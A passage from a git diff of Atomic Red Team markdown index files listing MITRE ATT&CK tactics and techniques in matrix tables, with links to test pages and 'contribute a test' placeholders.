TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Linker Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify System Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Service Scanning](../../T1046/T1046.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keychain](../../T1555.001/T1555.001.md) | [Network Sniffing](../../T1040/T1040.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Linker Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Linker Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [GUI Input Capture](../../T1056.002/T1056.002.md) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Process Discovery](../../T1057/T1057.md) | | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | [Unix Shell](../../T1059.004/T1059.004.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [Launchd](../../T1053.004/T1053.004.md) | [File Deletion](../../T1070.004/T1070.004.md) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](../../T1518/T1518.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) | | [Screen Capture](../../T1113/T1113.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) | +| | | [Launchd](../../T1053.004/T1053.004.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | [Local Account](../../T1136.001/T1136.001.md) | [Plist Modification](../../T1547.011/T1547.011.md) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [RC Scripts](../../T1037.004/T1037.004.md) | [Hidden Users](../../T1564.002/T1564.002.md) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Re-opened Applications](../../T1547.007/T1547.007.md) | Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | +| | | [Plist Modification](../../T1547.011/T1547.011.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Startup Items](../../T1037.005/T1037.005.md) | [Impair Command History Logging](../../T1562.003/T1562.003.md) | Web Cookies [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Non-Standard Port](../../T1571/T1571.md) | | +| | | [RC Scripts](../../T1037.004/T1037.004.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Trap](../../T1546.005/T1546.005.md) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Remote Access Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [Startup Items](../../T1037.005/T1037.005.md) | | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | | +| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [Trap](../../T1546.005/T1546.005.md) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | +| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | | +| | | | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index 7bff2d93..a2fa1917 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md @@ -1,108 +1,114 @@ # All Atomic Tests by ATT&CK Tactic & Technique | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact | |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| -| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) | -| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | +| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) | +| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | | [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) | | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| [External Remote Services](../../T1133/T1133.md) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [CMSTP](../../T1218.003/T1218.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| [Local Accounts](../../T1078.003/T1078.003.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A 